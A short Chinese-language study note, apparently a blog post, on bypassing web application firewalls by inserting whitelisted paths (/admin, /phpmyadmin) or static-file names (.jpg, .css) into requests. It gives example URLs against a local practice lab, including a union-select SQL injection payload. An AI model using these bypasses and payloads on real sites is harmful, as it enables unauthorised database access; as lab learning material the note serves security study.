1.白名单绕过:waf可能会对一些报名单文件不拦截,可以在请求中插入一些白名单文件名测试绕过
常见目录
/admin
/phpmyadmin
/admin.php
例句:
http://192.168.0.115/06/vul/sqli/sqli_str.php?a=/admin.php&name=vince+&submit=1 http://192.168.0.165/06/vul/sqli/sqli_str.php/phpmyadmin?name=%27%20union%20select%201,user() —+&submit= 1
2.静态文件绕过
定义:不是由服务器生成的文件就是静态文件
原理:同上,waf可能会对一些静态文件不拦截,比如 件 jpg 、png 、gif 或者 css 、js
例句:
http://192.168.0.115/06/vul/sqli/sqli_str.php?/1.jpg&name=vince+&submit=1
/1.jpg=/1.jpg&name=vince+&submit=1
/1.css=/1.css&name=vince+&submit=1
pipline绕过 //没看懂,再说
若有收获,就点个赞吧
0 人点赞
